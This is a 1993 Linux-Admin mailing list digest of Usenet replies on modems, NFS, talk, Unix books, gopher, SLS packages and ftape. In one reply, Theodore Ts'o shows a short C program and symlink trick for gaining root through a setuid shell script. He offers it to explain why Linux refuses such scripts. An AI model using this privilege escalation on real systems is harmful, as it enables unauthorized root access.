From:     Digestifier <Linux-Admin-Request@senator-bedfellow.mit.edu>
To:       Linux-Admin@senator-bedfellow.mit.edu
Reply-To: Linux-Admin@senator-bedfellow.mit.edu
Date:     Sat, 16 Oct 93 15:13:22 EDT
Subject:  Linux-Admin Digest #112

Linux-Admin Digest #112, Volume #1               Sat, 16 Oct 93 15:13:22 EDT

Contents:
  Re: Dial-in & dial-out setup? (Savio Lam)
  Re: NFS mount of RS/6000 fs fails (Thilo Wunderlich)
  Re: talk between linux-systems and Suns (Wolfgang Sander-Beuermann)
  Re: OS programming in unix ? (Wolfgang Schelongowski)
  Re: Problems with setuid shell scripts (Theodore Ts'o)
  Re: [Summary] /etc/shutdown by non-root (Theodore Ts'o)
  Re: talk between linux-systems and Suns (Mohd Hamid Misnan)
  Re: Dos + Linux 2 Controllers (Philippe Bonal)
  Is there a gopher for Linux (Not for X)? (Yi-Tsun Chang)
  Re: Is there a gopher for Linux (Not for X)? (Daniel M. Coleman)
  Re: OPT, REC, IMP (Brandon S. Allbery)
  Re: OPT, REC, IMP (Jonathan Magid)
  installing ftape-0.9.6 (Dr. Raimund K. Ege)

----------------------------------------------------------------------------

From: lam836@cs.cuhk.hk (Savio Lam)
Subject: Re: Dial-in & dial-out setup?
Reply-To: lam836@cs.cuhk.hk
Date: Wed, 13 Oct 1993 03:00:49 GMT

Uri Blumenthal (uri@watson.ibm.com) wrote:
> Hi,
>       Apologies if this is FAQ (though I couldn't find the
>       relevant answer yet :-).

>       I'm trying to use modem for incoming and outgoing calls.
>       I've tried to put
>               s1:6:/etc/getty 38400 ttyS1
>       or
>               s1:6:/etc/uugetty 38400 ttyS1

>       line into /etc/inittab, the result is sad: it locks the
>       line, so that outgoing calls are impossible. Only if I
>       comment it out (i.e. get rid of getty waiting on the
>       modem) can I dial out.

>       I'm using 0.99.13 kernel and SLS-1.03... Help please!
>       Thanks! [Please e-mail replies.]

Get the new version of getty (2.0.7b?) from
sunsite.unc.edu:/pub/Linux/system/Serial.

Regards,
Savio Lam.

--
###############################################################################
#                                 |        _                                  #
# ------------------------------- |      _| |_                                #
# Lam Lai Yin, Savio              |     |_   _|                               #
#                                 |       | |                                 #
# Internet: lam836@cs.cuhk.hk     |     /     \     Can't live with DOS?      #
# Department of Computer Science  |    |  DOS  |                              #
# Chinese University of Hong Kong |    |       |    Try Linux...              #
# ------------------------------- |    |       |                              #
#                                 |  ^^^^^^^^^^^^^                            #
###############################################################################

------------------------------

From: c15o@zfn.uni-bremen.de (Thilo Wunderlich)
Subject: Re: NFS mount of RS/6000 fs fails
Date: 14 Oct 1993 16:47:33 GMT

josch@pc.chemie.th-darmstadt.de (Joachim Schnitter) writes:

AIX <-> Linux NFS


Sorry about the german answer but I tried to send it with mail:

  --- The transcript of the session follows ---
421 pc.chemie.th-darmstadt.de.tcp... Deferred: A system call received a parameter that is not valid.
550 josch@pc.chemie.th-darmstadt.de... Host unknown: A system call received a parameter that is not valid.

  --- The unsent message follows ---
Received: by rs61.zfn.uni-bremen.de (AIX 3.2/UCB 5.64/4.03)
          id AA09790; Thu, 14 Oct 1993 16:26:16 +0100
Date: Thu, 14 Oct 1993 16:26:16 +0100
From: c15o (Thilo Wunderlich)
Message-Id: <9310141526.AA09790@rs61.zfn.uni-bremen.de>
To: josch@pc.chemie.th-darmstadt.de
Subject: Re: NFS mount of RS/6000 fs fails
Newsgroups: comp.os.linux.admin
References: <29h61gINNe6r@rs18.hrz.th-darmstadt.de>

In comp.os.linux.admin you write:

NFS Linux <-> AIX

Hallo Joachim,
ich glaube ich habe vor laengerer Zeit mal genau die gleiche Frage gelesen
und ich meine Die Antwort hatte etwas mit den Options zu tun, wie AIX
das Verzeichnis exportiert. Soweit ich mit erinnere musste man 
die Securityoption heruntersetzen.

Hoffe das hilft, wenn nicht, bitte die Loesung :*) Ich habe genau das gleiche
vor.

Gruss

 Thilo


-- 
Thilo Wunderlich    c15o@alf.zfn.uni-bremen.de
                      tw@nice.delme.north.de
-- 
Thilo Wunderlich    c15o@alf.zfn.uni-bremen.de
                      tw@nice.delme.north.de

------------------------------

From: root@behre.han.de (Wolfgang Sander-Beuermann)
Subject: Re: talk between linux-systems and Suns
Date: Fri, 15 Oct 1993 17:20:54 GMT

Norbert Breidohr (brei@ouzo.informatik.rwth-aachen.de) wrote:
[...]
> I tried to do a talk between me (logged in to my linux-site) and
> an user on a sun-sparcstation. I know, linux and SunOS by default
> use different versions of the talk-protocol. So I tried to use
> several versions of talk and talk-daemons on linux-side but none
> got a connection to the sun. On boths machines talk displays the
> following messages
>    No connection yet
>    Checking for invitation an caller's machine
> After the last message the talk at sun hangs until pressing ctrl-c
> and on the linux-site talk dies with the message "Alarm clock".

> I think the problem could be solved using a different talk and/or
> talkd on linux-site. What I'm really missing is something link
[...]

From what I've heard <ytalk> should be able to deal with *any* of
the known talk programs. You have to check out archie where to find
it.

Wolfgang Sander-Beuermann        +49 5085 6118           root@behre.han.de

------------------------------

From: ws@xivic.bo.open.de (Wolfgang Schelongowski)
Subject: Re: OS programming in unix ?
Date: Fri, 15 Oct 93 16:53:29 MEST

simmonr5387@cobra.uni.edu writes:

> Does anyone know of a good book that teaches programming unix (ie using
> system calls and so forth) if so can I get title and author.
> BTW I am a good C programmer, i just have never written anything to interact
> with unix OS. So a newbie book is NOT what I am looking for.


Check this regular posting:

  From: sko@wimsey.bc.ca (Samuel Ko)
...
  Newsgroups: misc.books.technical,alt.books.technical,\
     biz.books.technical,comp.unix.questions,comp.unix.wizards,\
     comp.unix.admin,comp.answers,news.answers
  Subject: [misc.books.technical]  A Concise Guide to UNIX Books
...
  Archive-name: books/unix


You can get the current version by mailing to
mail-server@rtfm.mit.edu with the message body:
  help
  send usenet/news.answers/books/unix
Ftp is possible, too.


I'll not repost it here, because it is very long and my version is
probably outdated. You will be interested in part H, which starts
like:

  H. Programming
******************

1. Title: The Unix Programming Environment
   Authors: Brian Kernighan and Rob Pike
   Publisher: Prentice-Hall
   Edition: 1984
   ISBN: 0-13-937681-X
   Comment: A true classic on Unix programming ...


2. Title: Advanced Programming in The Unix Environment
   Author: Richard Stevens
   Publisher: Addison-Wesley
   Edition: 1992
   ISBN: 0-201-56317-7
   Comment: **** Highly Recommended ****
            A going-to-be classic on how programs work under Unix ...
            The source codes and errata list are obtainable by anonymous ftp
            from ftp.uu.net (in /published/books).


3. Title: Advanced Unix Programming
   Author: Marc Rochkind
   Publisher: Prentice Hall
   Edition: 1985
   ISBN: 0-13-011818-4
   Comment: A superb book covering all system calls in detail ...

... more to follow. You'll have a lot of books to choose from.

------------------------------

From: tytso@athena.mit.edu (Theodore Ts'o)
Subject: Re: Problems with setuid shell scripts
Date: 15 Oct 1993 23:56:06 -0400
Reply-To: tytso@athena.mit.edu (Theodore Ts'o)

   From: mackintosh@ug.eds.com (Alasdair Mackintosh)
   Date: 15 Oct 1993 12:54:16 GMT
   Reply-To: mackintosh@ug.eds.com (Alasdair Mackintosh)

       I've been unable to get setuid shell scripts to work under Linux.
       I create the following shell script owned by root:

Yes, as was discussed before, setuid shell scripts are security holes
that you can drive trucks through.

Give me a setuid shell script, and a non-privileged logon, and in 15
seconds I can become root on your system.

Is that a good enough reason why Linux doesn't support setuid shell
scripts?

                                                        - Ted

------------------------------

From: tytso@athena.mit.edu (Theodore Ts'o)
Subject: Re: [Summary] /etc/shutdown by non-root
Date: 15 Oct 1993 23:57:16 -0400
Reply-To: tytso@athena.mit.edu (Theodore Ts'o)

   From: tytso@athena.mit.edu (Theodore Y. Ts'o)
   Crossposted-To: comp.unix.admin
   Date: 15 Oct 1993 05:08:32 GMT

   Here's what I would have to do:

   cd /tmp
   cat > foo.c
   char *args[] = { "heh heh heh", "0" };

   main(argc,argv)
   {
           execve("-", args, envp);
   }
   ^D
   ln -s /etc/setuid-script -      
   -

Oops; I typed this last message too late last night.  Obviously, the
last line should be replaced by:

cc -o foo foo.c
foo

This will work no matter what shell you are using, since you are
exec'ing the setuid shell script directly.

                                                - Ted

------------------------------

From: hamid@mhmsys.pc.MY (Mohd Hamid Misnan)
Subject: Re: talk between linux-systems and Suns
Date: Fri, 15 Oct 93 09:48:23 GMT

In <29k3tj$97q@flode.nvg.unit.no> agulbra@nvg.unit.no (Arnt Gulbrandsen) writes:

>The solution is for Sun to use the new one, but in the meantime you
>can get and install ytalk on both machines.  The latest version is
>3.0.1.  It's in the USENET sources archives, and I can make it
>avialable for FTP if anyone wants me to.

 Yes please, I got ytalk.shar from somewhere in the net and don't remember the
 version but it won't compile on my Linux. If you've ported it into Linux, can
 you put it somewhere in Linux ftp sites? Thanks in advance.

 Hamid


-- 
--
Mohd Hamid Misnan   | System Development Executive
hamid@mhmsys.pc.my  | PETRONAS BHD
SnailM: DMDS, 8th Flr, Faber Tower(1), Taman Desa, 58700 Kuala Lumpur
Disclaimer: STANDARD DISCLAIMER APPLIED

------------------------------

From: philb@blips.frmug.fr.net (Philippe Bonal)
Subject: Re: Dos + Linux 2 Controllers
Date: Sat, 16 Oct 93 01:13:30 +0100
Reply-To: philb@frmug.fr.net

morrison@ccad.uiowa.edu (Michael Morrison) writes:

> Is is possible to boot and use DOS off of the 2nd hard drive controller
> in your system?  I have 2 MFM drives with Linux installed on them (with
> LILO), and just got an IDE hd+controller that I want to run DOS off of.
>

Perhaps bootlin.com is an answer.
It's a dos program loader of kernel image from the dos config.sys (with
boot.sys) if you want, I use it and not use LILO.

This program is very attractive when re-compiling kernel because there is
not problems with LILO.

+---------------------------------------------------------------------------+
 philb@frmug.fr.net  Philippe Bonal (France)  Please,Not email > 25k without
 philb@blips.frmug.fr.net  bonal_p@epita.fr          inform me, No NeXT mail
+---------------------------------------------------------------------------+

------------------------------

From: ytchang@magnus.acs.ohio-state.edu (Yi-Tsun Chang)
Subject: Is there a gopher for Linux (Not for X)?
Date: 16 Oct 1993 07:58:30 GMT

I am looking for the gopher program for linux which does not need X. I have 
used the archie searching for the key word 'gopher'. However, all I can get are
gopher for X. I couldn't  find any gopher package that doesn't X. If you know 
anything about this. Please email to me. I will be very much appreicated.

alex

------------------------------

From: dcoleman@mbs.telesys.utexas.edu (Daniel M. Coleman)
Subject: Re: Is there a gopher for Linux (Not for X)?
Date: 16 Oct 1993 14:20:19 GMT

In article <29o9j6$281@charm.magnus.acs.ohio-state.edu>,
Yi-Tsun Chang <ytchang@magnus.acs.ohio-state.edu> wrote:
>I am looking for the gopher program for linux which does not need X. I have 
>used the archie searching for the key word 'gopher'. However, all I can get are
>gopher for X. I couldn't  find any gopher package that doesn't X. If you know 
>anything about this. Please email to me. I will be very much appreicated.

Check on wuarchive.wustl.edu in /packages/Unix/gopher and get
gopher2.08.tar.Z.  It compiled on my system without difficulty.

Dan

-- 
Daniel Matthew Coleman             | Internet: dcoleman@mbs.telesys.utexas.edu
===================================+         : dcoleman@mcl.cc.utexas.edu
The University of Texas at Austin  |         : dcoleman@utxvms.cc.utexas.edu
Electrical/Computer Engineering    |         : dcoleman@ccwf.cc.utexas.edu

------------------------------

From: bsa@kf8nh.wariat.org (Brandon S. Allbery)
Subject: Re: OPT, REC, IMP
Date: Sat, 16 Oct 1993 14:25:35 GMT

In article <CExqIn.93@scrum.greenie.muc.de> root@scrum.greenie.muc.de writes:
>tornado@esu.edu (Reed Mangino) writes:
>>Could someone please tell me what OPT, REC, and IMP mean, respectively?
>
>I think they are just hints for those with not enough HD-space :-))
>OPT means optional
>REC means recommended
>IMP means important (I'm not quite sure about that one , never seen with

"imperative"

The stupid thing being that, in prompt mode, you're allowed to *skip*
IMPerative packages... (imagine saying "n" to installing the "image" package)

++Brandon
-- 
Brandon S. Allbery         kf8nh@kf8nh.ampr.org          bsa@kf8nh.wariat.org
"MSDOS didn't get as bad as it is overnight -- it took over ten years
of careful development."  ---dmeggins@aix1.uottawa.ca

------------------------------

From: jem@sunSITE.unc.edu (Jonathan Magid)
Subject: Re: OPT, REC, IMP
Date: 16 Oct 1993 15:15:47 GMT

>In article <CExqIn.93@scrum.greenie.muc.de> root@scrum.greenie.muc.de writes:
>>tornado@esu.edu (Reed Mangino) writes:
>>>Could someone please tell me what OPT, REC, and IMP mean, respectively?
>>I think they are just hints for those with not enough HD-space :-))
>>OPT means optional
>>REC means recommended
>>IMP means important (I'm not quite sure about that one , never seen with

I wrote the descriptions for the SLS install a few months ago, after getting
tired of the very common "Do I really need to install this?" questions
on col.  Since those questions have all but disappeared since Peter included
the descriptions, I'll assume it has roughly worked.

Unfortunately the accompanying document which explained what I meant by
OPT,REC,IMP did not get included. Ah well.  In any case, this answer is
pretty much the right one. Unfortunately this scheme doesn't allow 
the relative importance between packages to be elucidated: for example,
if you want openlook, then X11 is mandatory.  It looks like the Debian
release may address this short-coming though. 

cheers,
jem.

------------------------------

From: ege@cerl.fiu.edu (Dr. Raimund K. Ege)
Subject: installing ftape-0.9.6
Date: Sat, 16 Oct 1993 15:22:38 GMT

my installation of ftape-0.9.6 has run into trouble.
Maybe a kind soul can help me to continue. Here is
a history of what I did:

- SLS base with pl13, gcc 2.4.5
- got ftape-0.9.6 from sunsite.unc.edu
- instructions say to first install the "modules"
  (1. questions: does that mean that I have to
     add the modules package to every new linux patch
     level in order to use ftape ?)
- the instructions for the "modules" package refer
  to pl12. The supplied diffs file works on my clean
  pl13 source, but a kernel make does not compile.
- the reason why it does not compile is that it needs
  to be compiled with g++. OK, so I change the top-level
  makefile to g++. Kernel compiles, except for the zBoot
  subdirectory. OK, so I change that makefile to use gcc.
  All compiles, links and gets me a new boot disk image.
- further following instructions in the modules package,
  reboot and compile and install the files in the utils directory.
- notice that the makefile uses "cc" but really requires "g++" !
- now, I try to insert the sys_hello.o module into the kernel,
  get error message: 

        insmod sys_hello.o
        Kernel symbol problem 1
- and 
        lsmod
        Module:        #pages:

- so now I am stuck !

Is there a way to install ftape without the modules package ?

Any help is appreciated.

-- 
Raimund K. Ege                             School of Computer Science
                                             Florida Int'l University
ege@scs.fiu.edu           (305) 348-3381              University Park
ege@servax.bitnet     FAX (305) 348-3549              Miami, FL 33199

------------------------------


** FOR YOUR REFERENCE **

The service address, to which questions about the list itself and requests
to be added to or deleted from it should be directed, is:

    Internet: Linux-Admin-Request@NEWS-DIGESTS.MIT.EDU

You can send mail to the entire list (and comp.os.linux.admin) via:

    Internet: Linux-Admin@NEWS-DIGESTS.MIT.EDU

Linux may be obtained via one of these FTP sites:
    nic.funet.fi				pub/OS/Linux
    tsx-11.mit.edu				pub/linux
    sunsite.unc.edu				pub/Linux

End of Linux-Admin Digest
******************************
